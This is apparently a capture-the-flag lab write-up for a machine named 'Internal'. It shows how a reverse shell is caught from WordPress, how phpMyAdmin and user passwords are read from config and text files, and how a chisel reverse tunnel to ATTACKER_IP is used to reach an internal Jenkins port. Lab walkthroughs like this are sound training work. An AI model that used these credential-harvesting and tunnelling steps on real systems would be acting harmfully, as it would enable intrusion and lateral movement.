Internal
Server Enumeration
- We can catch the Reverse Shell from
WordPressUsingnetcat
www-data@internal /$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
- This
Configuration Filecontains PHPMyAdmin Credentials:/etc/phpmyadmin/config-db.php - phpmyadmin:B2Ud4fEOZmVq
- [NOTE] PHPMyAdmin is a Rabbit Hole.
$dbuser='phpmyadmin';
$dbpass='B2Ud4fEOZmVq';
- File:
/opt/wp-save.txt - Contains Credentials of the User: aubreanna:bubb13guM!@#123
www-data@internal /$ cat /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later.
Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
Tunneling
- Switching to User: aubreanna
- With further Enumeration we find that Jenkins is running Locally [LOCAL:8080]
- We can use either
SSH Tunnelingor chisel as a TCP/UDP Tunnel.
aubreanna@internal:~$ id
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)
aubreanna@internal:~$ ls -l
total 12
-rwx------ 1 aubreanna aubreanna 55 Aug 3 2020 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug 3 2020 snap
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
aubreanna@internal:~$ netstat -netulp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 111 23071 -
tcp 0 0 127.0.0.1:35053 0.0.0.0:* LISTEN 0 23056 -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 0 24180 -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 18568 -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 22230 -
tcp6 0 0 :::80 :::* LISTEN 0 22553 -
tcp6 0 0 :::22 :::* LISTEN 0 22246 -
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 18567 -
udp 0 0 10.10.90.155:68 0.0.0.0:* 100 18382 -
Chisel
- Transfer the chisel Binary on the Target Machine.
- Server
- Target
chisel server --reverse --port 8000
chisel client ATTACKER_IP:8000 R:8080:127.0.0.1:8080